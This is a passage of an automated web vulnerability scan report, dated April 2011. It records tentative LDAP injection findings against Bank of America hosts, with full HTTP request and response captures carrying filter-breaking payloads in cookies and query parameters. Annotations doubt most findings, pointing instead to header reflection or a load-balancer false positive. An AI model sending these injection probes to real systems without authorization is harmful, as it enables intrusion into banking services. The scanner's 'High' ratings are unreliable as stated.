...[SNIP]...
<h1 class="pageTitle">Reset Password Wait</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height
...[SNIP]...

2.4. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [ngen_throttle cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login-wait.jsp

Issue detail

The ngen_throttle cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1619b63cb2b56805)(sn=* and 1619b63cb2b56805)!(sn=* were each submitted in the ngen_throttle cookie. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. In the captures below the first response carries the title "Reset Password Wait" (9030 bytes) and the second "Sorry" (9016 bytes), the reverse of the order seen for the TCID cookie in 2.3 above; apart from the title the pages are identical and both redirect to /efs/servlet/military/DetectDemoMode, so the difference is not shown to depend on the payload.

Request 1

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=1619b63cb2b56805)(sn=*; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:43:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9030


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Reset Password Wait</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height
...[SNIP]...

Request 2

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=1619b63cb2b56805)!(sn=*; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:43:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9016


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Sorry</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height="1"></div>
<
...[SNIP]...

2.5. http://sofa.bankofamerica.com/cm [cck parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The cck parameter appears to be vulnerable to LDAP injection attacks.

The payloads 5af86ec746dc2d56)(sn=* and 5af86ec746dc2d56)!(sn=* were each submitted in the cck parameter. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. What the captures below actually show is the cck value echoed verbatim as a Set-Cookie header, next to a 90010394_login cookie whose value changes on every request; the bodies are the same 43-byte GIF. The reflection of a query parameter into a response header is the behaviour worth examining further here (its handling of CR and LF, CWE-113); it is not in itself evidence of an LDAP query.

Request 1

GET /cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck=5af86ec746dc2d56)(sn=* HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 5af86ec746dc2d56)(sn=*; path=/; expires=Sat, 25 Apr 2026 12:26:54 GMT
Set-Cookie: 90010394_login=1303820814016783873090010394; path=/
Set-Cookie: 90010394_reset=1303820814;path=/
Expires: Mon, 25 Apr 2011 18:26:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck=5af86ec746dc2d56)!(sn=* HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 5af86ec746dc2d56)!(sn=*; path=/; expires=Sat, 25 Apr 2026 12:26:54 GMT
Set-Cookie: 90010394_login=1303820814018461594690010394; path=/
Set-Cookie: 90010394_reset=1303820814;path=/
Expires: Mon, 25 Apr 2011 18:26:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.6. http://sofa.bankofamerica.com/cm [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads bcc72cbfd1bac411)(sn=* and bcc72cbfd1bac411)!(sn=* were each submitted in the ci parameter. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. The captures below show the ci value echoed verbatim into the names of the _login and _reset cookies and appended to the _login value; the bodies are the same 43-byte GIF and the only other change is the per-request portion of the _login value. As with the cck parameter in 2.5, the reflection of a request parameter into Set-Cookie headers is the behaviour to examine further (CR and LF handling, CWE-113); it is not itself evidence of an LDAP query.

Request 1

GET /cm?ci=bcc72cbfd1bac411)(sn=*&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:16 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: bcc72cbfd1bac411)(sn=*_login=13038207760016843786bcc72cbfd1bac411)(sn=*; path=/
Set-Cookie: bcc72cbfd1bac411)(sn=*_reset=1303820776;path=/
Expires: Mon, 25 Apr 2011 18:26:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=bcc72cbfd1bac411)!(sn=*&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:16 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: bcc72cbfd1bac411)!(sn=*_login=13038207760067175434bcc72cbfd1bac411)!(sn=*; path=/
Set-Cookie: bcc72cbfd1bac411)!(sn=*_reset=1303820776;path=/
Expires: Mon, 25 Apr 2011 18:26:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.7. http://sofa.bankofamerica.com/eluminate [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 7fd121d0852e72ac)(sn=* and 7fd121d0852e72ac)!(sn=* were each submitted in the ci parameter. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. The /eluminate endpoint behaves exactly like /cm in 2.6: the ci value is echoed verbatim into the names of the _login and _reset cookies and appended to the _login value, the bodies are the same 43-byte GIF, and the remaining difference is the per-request portion of the _login value. The header reflection is what merits a follow-up check (CR and LF handling, CWE-113), not the LDAP hypothesis.

Request 1

GET /eluminate?tid=6&ci=7fd121d0852e72ac)(sn=*&vn2=e4.0&st=1303820908565&vn1=4.2.7.1BOA&ec=utf-8&pi=WIM%3AApp%3AOAO%3BOAO%3AGlobal&cg=WIM%3AApp%3AOAO&rnd=1303827070107&pc=Y&jv=1.6&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&ul=http%3A//www.merrilledge.com/m/pages/global-oao.aspx HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281; 90010394_login=1303820765016783873090010394; 90010394_reset=1303820765; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:29:31 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 7fd121d0852e72ac)(sn=*_login=130382097101678387307fd121d0852e72ac)(sn=*; path=/
Set-Cookie: 7fd121d0852e72ac)(sn=*_reset=1303820971;path=/
Expires: Mon, 25 Apr 2011 18:29:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /eluminate?tid=6&ci=7fd121d0852e72ac)!(sn=*&vn2=e4.0&st=1303820908565&vn1=4.2.7.1BOA&ec=utf-8&pi=WIM%3AApp%3AOAO%3BOAO%3AGlobal&cg=WIM%3AApp%3AOAO&rnd=1303827070107&pc=Y&jv=1.6&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&ul=http%3A//www.merrilledge.com/m/pages/global-oao.aspx HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281; 90010394_login=1303820765016783873090010394; 90010394_reset=1303820765; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:29:31 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 7fd121d0852e72ac)!(sn=*_login=130382097100168437867fd121d0852e72ac)!(sn=*; path=/
Set-Cookie: 7fd121d0852e72ac)!(sn=*_reset=1303820971;path=/
Expires: Mon, 25 Apr 2011 18:29:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.8. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.

The payloads 4f1f2a3187adb27d)(sn=* and 4f1f2a3187adb27d)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a disjunctive LDAP query. A caveat before acting on this: BIGipServer* cookies are F5 BIG-IP persistence cookies consumed by the load balancer rather than by the application, and the two responses below differ only in their Set-cookie lines (ngen_throttle, and hp_beta present in one but not the other) while both bodies have Content-Length 8843. That is the pattern an unparseable persistence cookie produces when the balancer simply picks a pool member afresh, so treat this as a likely false positive unless a payload can be shown to change the response body.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=4f1f2a3187adb27d)(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:31 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000kDekljq8oj8aDBUBvjJHnMM:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=363; Expires=Sun, 23 Oct 2011 12:44:30 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:30 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=4f1f2a3187adb27d)!(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:31 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00005In7HcqpnQV0X22RgYk-TSU:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=9513; Expires=Sun, 23 Oct 2011 12:44:31 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
